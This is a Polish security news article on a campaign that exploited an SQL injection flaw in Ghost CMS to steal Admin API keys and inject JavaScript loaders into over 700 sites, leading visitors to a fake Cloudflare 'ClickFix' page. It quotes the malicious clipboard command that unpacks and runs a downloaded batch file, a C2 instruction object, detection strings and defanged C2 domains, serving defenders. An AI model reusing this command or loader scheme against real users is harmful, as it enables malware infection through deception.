Ponad 700 stron opartych na Ghost CMS zainfekowano fałszywą Captchą (ClickFix)

Badacze z XLab wykryli kampanię wymierzoną w strony wykorzystujące Ghost CMS. Atakujący wykorzystał podatność SQL injection (CVE-2026-26980) do uzyskania klucza API, a następnie użył go do masowego modyfikowania treści, wstrzykując złośliwy kod JavaScript.

TLDR:

• Atakujący wykorzystują podatność SQL injection (CVE-2026-26980) w Ghost CMS do kradzieży Admin API Key i masowego wstrzykiwania złośliwego JavaScriptu do artykułów.
• Kampania objęła ponad 700 domen, w tym strony uczelni, SaaS, fintech i mediów.
• Wstrzyknięty loader pobiera z serwera C2 kolejne etapy ataku prowadzące do kampanii ClickFix/Fake CAPTCHA.
• Ofiary są nakłaniane do ręcznego uruchomienia malware poprzez fałszywą weryfikację Cloudflare.

Chociaż podatność CVE-2026-26980 została publicznie ujawniona już 19 lutego, wiele stron nie zostało załatanych, co stworzyło okazję dla atakujących. Badacze zidentyfikowali łącznie ponad 700 domen, które zostały zainfekowane – mowa o stronach uniwersytetów, SaaS, fintech, mediów, ale także blockchain czy AI.

Źródłem problemu jest podatność CVE-2026-26980 (SQL injection), która pozwalała atakującym odczytać zawartość baz danych – w tym klucz API. Ghost korzysta z dwóch typów kluczy:

• Content API Key: domyślnie tylko do odczytu, używany przez frontend do wyświetlania opublikowanych treści;
• Admin API Key: posiada uprawnienia administracyjne do artykułów, motywów, użytkowników itd. i może wykonywać na nich operacje CRUD;

Po pomyślnym uzyskaniu klucza Admin API Key docelowej strony atakujący modyfikuje treść artykułów poprzez API, wstawiając złośliwy kod na dole artykułu.

Dla funkcji atob() podano jako parametr zakodowany w Base64 adres serwera C2 (https[:]//clo4shara[.]xyz/11z77u3[.]php). Całość jest przykładem dwuetapowego loadera: pierwszy etap zostaje zapisany w bazie danych Ghost dla danego artykułu, a właściwy payload jest zwracany przez C2. Atakujący może więc zmieniać scenariusz ataku bez konieczności ponownego przejmowania strony.

Badacze pobrali z C2 fragment kodu, który jest w rzeczywistości typowym skryptem dystrybucji ruchu. Jego główną funkcją jest zbieranie różnych informacji fingerprint z przeglądarki użytkownika i wysyłanie ich na serwer, a następnie wykonywanie działań takich jak przekierowania, popupy i pobierania na podstawie zwróconych instrukcji. Po analizie uważamy, że ten skrypt PHP nie został opracowany niezależnie przez atakujących, lecz pochodzi od komercyjnego dostawcy usług Cloaking Adspect. W złośliwych scenariuszach technologia Cloaking umożliwia witrynom dynamiczne przełączanie treści w zależności od tożsamości odwiedzającego: prawdziwe ofiary otrzymują złośliwy payload, podczas gdy badacze bezpieczeństwa lub crawlery widzą jedynie nieszkodliwą „bezpieczną stronę”.

Zbieranie fingerprintów

Kod tworzy fingerprint ofiary z wielu informacji, takich jak przeglądarka, system i hardware (np. parametry WebGL, Navigator, strefa czasowa itd.). Wygenerowany w ten sposób identyfikator jest przesyłany do serwera C2.

Zdalna kontrola

Kod umożliwia wykonywanie dowolnego kodu JavaScript w przeglądarce ofiary na podstawie instrukcji otrzymanych z serwera.

Oto instrukcje, jakie zwracano w tej kampanii:

window._adata = {  “ok”: true,  “action”: “iframe”,  “cid”: “69fca6a9ad57095d”,  “js”: false,  “target”: “https://cloud-verification[.]com”};

Listing 1 – instrukcje dla funkcji w(a), źródło: blog.xlab.qianxin.com

Skrypt tworzył więc element iframe, powodując załadowanie przez przeglądarkę strony kolejnego etapu ataku – cloud-verification[.]com.

Z perspektywy użytkownika przeglądarka wyświetla stronę “weryfikacji” podszywającej się pod Cloudflare:

Atak socjotechniczny ClickFix

Strona wspomniana w poprzednim rozdziale podszywa się pod mechanizm weryfikacji Cloudflare. Jest to znana nam metoda, o której pisaliśmy już na sekuraku.

Gdy użytkownik kliknie “Verify”, strona prowadzi go do wykonania kolejno trzech kroków w celu przejścia weryfikacji:

Równocześnie strona uruchamia opóźnione o 500 milisekund (zapewne aby zmniejszyć szanse na zauważenie przez użytkownika) pobieranie pliku z https[:]//cloud-verification[.]com/update[.]zip.

Pobrany payload ma zostać uruchomiony przez użytkownika, za pomocą polecenia, które strona umieszcza w jego schowku:

cmd /c “move %USERPROFILE%\Downloads\update.zip %TEMP%\u.zip && tar -xf %TEMP%\u.zip -C %TEMP% && start /min “” %TEMP%\update.bat” & REM* I am not a robot reCAPTCHA Verification ID:2771

Listing 2 – złośliwe komendy do wklejenia, źródło: blog.xlab.qianxin.com

Po uruchomieniu złośliwych poleceń archiwum ZIP przenoszone jest z pobranych do katalogu tymczasowego, a następnie rozpakowane. Na koniec w tle wykonywany jest złośliwy plik update.bat. Ostatnia linia pozoruje kod weryfikacyjny reCAPTCHA, zapewne w celu uśpienia czujności użytkownika.

Badacze zidentyfikowali 4 różne adresy pobierania – ich podstawowa logika jest jednak taka sama: pobranie pliku DLL i wywołanie funkcji Begin przez rundll32. Jedna z próbek uruchamia plik kolejnego etapu – UtilifySetup.exe – który jest programem opartym na Electronie.

Po deobfuskacji nietrudno zauważyć, że wykorzystuje wbudowane w Electron API setLoginItemSettings do osiągnięcia persystencji, a dodatkowo co 30 sekund wysyła żądanie POST do serwera web-telegram[.]ug. Zależnie od otrzymanej odpowiedzi, malware może wykonywać dowolny kod JS lub uruchamiać pliki wykonywalne.

Jeśli korzystacie z Ghost, upewnijcie się, czy używacie aktualnej wersji. Jeśli nie – pilnie zaktualizujcie do najnowszej dostępnej.

W ramach sprawdzenia, czy strona nie padła ofiarą ataku, polecamy sprawdzić treść wpisów – czy zawierają którykolwiek z poniższych fragmentów:

• sj.ssc/ipa/ lub ghost_once_footer_
• atob( i appendChild występujące razem w treści artykułu
• btoa(a.origin)

Warto także sprawdzić logi backendu pod kątem nietypowych żądań PUT do /ghost/api/admin/posts/:id/, zwłaszcza pochodzących z nieznanych adresów IP. Dodatkowe obszary do sprawdzenia to konfiguracja i pliki motywów – czy nie zostały dodane dodatkowe tagi <script> – oraz lista kluczy API Ghost.

W przypadku znalezienia złośliwej zawartości, zalecamy zrotowanie wszelkich poświadczeń: Admin API Key, Content API Key, hasło administratora, unieważnienie aktywnych sesji. Oczywiście należy także usunąć dodaną do treści strony złośliwą zawartość.

Z poziomu użytkownika można sprawdzić historię przeglądania i pobierania, szukając w niej złośliwych domen (pełna lista na końcu tekstu). Kluczowa jest jednak świadomość w zakresie cyberbezpieczeństwa. Nie należy wklejać jakichkolwiek treści w oknie uruchamiania, wierszu poleceń, pasku Eksploratora plików ani w konsoli przeglądarki, jeśli zostajemy o to poproszeni.

W organizacjach warto rozważyć całkowite zablokowanie okna Windows Run – zazwyczaj nie jest to niezbędne narzędzie, a stanowi łatwą metodę na pobranie i uruchomienie złośliwego oprogramowania w pozornie “niewinny” sposób. O tym, jak je zablokować, wspominaliśmy pod koniec tego tekstu.

IoC

Domeny C2:

• clo4shara[.]xyz
• cloud-verification[.]com
• jalwat[.]com
• com-apps[.]cc
• web-telegram[.]ug
• staticcloudflare[.]pro
• script-dev[.]buzz
• updatesecurity[.]pro
• updatefilescf[.]top
• static-file[.]digital
• download-file[.]today
• updatefile-cf[.]dgital
• script-dev[.]digital
• updatefile-cf[.]top
• script-dev[.]xyz

Źródło: blog.xlab.qianxin.com

~Tymoteusz Jóźwiak